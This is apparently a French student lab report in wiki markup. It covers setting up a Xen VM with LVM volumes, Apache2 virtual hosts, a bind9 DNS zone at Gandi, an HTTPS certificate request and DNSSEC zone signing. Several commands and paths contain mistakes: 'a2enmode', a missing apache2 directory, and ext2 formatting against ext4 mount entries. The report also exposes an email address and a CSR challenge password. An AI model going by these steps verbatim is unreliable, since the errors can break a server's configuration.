     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
==== Paquetages nécessaires pour RAID5 ====&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.local ====&lt;br /&gt;
Maintenant que le document est signé, il faut dire à Bind de pointer sur celui-ci plutot que sur db....&lt;br /&gt;
Pour ce faire il faut modifier named.conf.local de cette manière :&lt;br /&gt;
&lt;br /&gt;
//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/ima2a5-rex4ever.site.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.options ====&lt;br /&gt;
De même que pour le DNS, il faut modifier de la manière suivante pour le DNSSEC :&lt;br /&gt;
   '''dnssec-validation auto;'''&lt;br /&gt;
   '''dnssec-enable yes;'''&lt;br /&gt;
   '''dnssec-lookaside auto;'''&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
    };&lt;br /&gt;
    &lt;br /&gt;
    acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32; // adresse IP du dns6.gandi.net&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
